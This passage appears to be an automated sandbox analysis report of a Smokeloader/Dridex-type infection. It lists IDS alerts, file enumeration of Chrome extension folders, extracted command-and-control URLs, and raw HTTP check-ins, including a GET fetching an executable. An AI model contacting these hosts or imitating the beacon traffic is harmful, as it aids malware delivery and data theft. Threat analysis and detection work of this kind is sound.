                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49783 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49789 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49791 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49793 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49795 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\BC8F.exeCode function: 10_2_00007FF6AAB4FB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,10_2_00007FF6AAB4FB4C
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E02B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,13_2_00E02B15
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E01D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,13_2_00E01D4A
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_00E03ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,13_2_00E03ED9
                Source: C:\Windows\explorer.exeCode function: 14_2_001D30A8 FindFirstFileW,FindNextFileW,FindClose,14_2_001D30A8
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49785 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49760 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49786 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49790 -> 109.175.29.39:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49788 -> 109.175.29.39:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49794 -> 109.175.29.39:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49784 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49792 -> 109.175.29.39:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49787 -> 58.151.148.90:80
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49772 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49776 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49766 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49772 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49776 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49774 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49771 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49767 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49769 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49778 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49778 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49771 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49777 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49770 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49769 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49766 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49777 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49775 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49781 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49770 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49775 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49779 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49783 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49779 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49789 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49782 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49768 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49789 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49782 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49768 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49793 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49793 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49773 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49791 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49791 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49780 -> 23.145.40.162:443
                Source: Network trafficSuricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49780 -> 23.145.40.162:443
                Source: C:\Windows\explorer.exeNetwork Connect: 109.175.29.39 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 58.151.148.90 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.162 443Jump to behavior
                Source: Malware configuration extractorURLs: https://calvinandhalls.com/search.php
                Source: Malware configuration extractorURLs: https://bestworldhools.com/search.php
                Source: Joe Sandbox ViewIP Address: 109.175.29.39 109.175.29.39
                Source: Joe Sandbox ViewIP Address: 58.151.148.90 58.151.148.90
                Source: Joe Sandbox ViewASN Name: BIHNETBIHNETAutonomusSystemBA BIHNETBIHNETAutonomusSystemBA
                Source: Joe Sandbox ViewASN Name: POWERVIS-AS-KRLGPOWERCOMMKR POWERVIS-AS-KRLGPOWERCOMMKR
                Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
                Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.162:443 -> 192.168.2.4:49766
                Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xijgwgdevjmtswh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 249Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://fdgupvtosasiwa.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://kodkpkalobxsri.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 351Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://jurmqqmqntcvqoy.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://hftfsugmiikbs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://wyhdnnvnqsrlhywg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://lapmbexmlxcjol.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vblsrajdotdorwh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ofhxxqwynqyymdr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 320Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://sahqobiyulqik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://ccbxpmvivyv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://wxjecgujyrvwrcxv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 152Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://etbvtxkiimobbb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xidhlcltwnrqmpms.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://iqpmunwonthwxj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 276Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://xujwwosldbarb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 182Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://vntsetisbky.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 295Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://calvinandhalls.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 4431Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://osmeijnmqbad.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://esjrsvtmrom.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://yfclovtrctueuif.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: calvinandhalls.com
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yvmmviecnxldpero.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 271Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmehaoiwwenqht.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pmvrpbcqomr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ehjasruwjmcyiyc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mabsoalepkufuc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wlihjqaglis.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://djgtchksmne.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrsqrkoonpvkf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pqllteniaumhpux.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ksbeipjuadnqvhne.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikkkpskbtojtajm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 209Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tlcaywkjpltapmg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ljdtqpdqnfgadl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmsbxuxqcel.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sjpwecfehtwlg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvymdudugxqyqgd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vctlwttuihixctye.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: nwgrus.ru
                Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qkabdlcselvepu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 279Host: nwgrus.ru
